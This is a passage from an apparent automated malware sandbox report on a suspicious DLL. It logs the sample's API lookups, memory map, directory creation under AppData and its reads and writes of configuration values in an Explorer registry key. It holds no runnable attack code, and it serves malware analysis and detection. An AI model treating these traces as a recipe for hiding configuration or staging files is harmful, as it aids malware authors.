| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95597 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #27: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #27 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb94 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B98
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x002d0000 | 0x00336fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00407fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x0114ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012d0000 | 0x012d0000 | 0x014effff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95675 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #28: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xba0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x00297fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x0117ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
